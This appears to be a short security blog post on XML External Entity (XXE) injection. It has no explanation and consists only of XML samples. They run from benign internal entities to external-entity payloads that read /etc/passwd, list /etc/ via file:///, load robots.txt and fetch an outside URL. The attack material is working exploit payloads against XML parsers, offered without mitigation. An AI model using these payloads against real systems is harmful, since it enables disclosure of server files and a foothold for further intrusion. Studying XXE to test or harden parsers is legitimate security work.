/security/

XML External Entity (XXE)

2018-01-07 20:29:04

<?xml version="1.0"?>
<!DOCTYPE change-log\[
        <!ENTITY myName "Michal">
        <!ENTITY mySurname "Szalkowski">
        \]>
<change-log>
    <text>&myName; &mySurname;</text>
</change-log>

<?xml version="1.0"?>
<!DOCTYPE
        change-log \[
        <!ENTITY systemEntity SYSTEM "http://example.com/feed/">
        \]
        >
<change-log>
    <text>&systemEntity;</text>;
</change-log>

<?xml version="1.0"?>
<!DOCTYPE change-log \[<!ENTITY systemEntity SYSTEM "robots.txt">\]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!DOCTYPE change-log \[<!ENTITY systemEntity SYSTEM "/etc/passwd">\]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!DOCTYPE change-log \[<!ENTITY systemEntity SYSTEM 'file:///etc/'>\]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>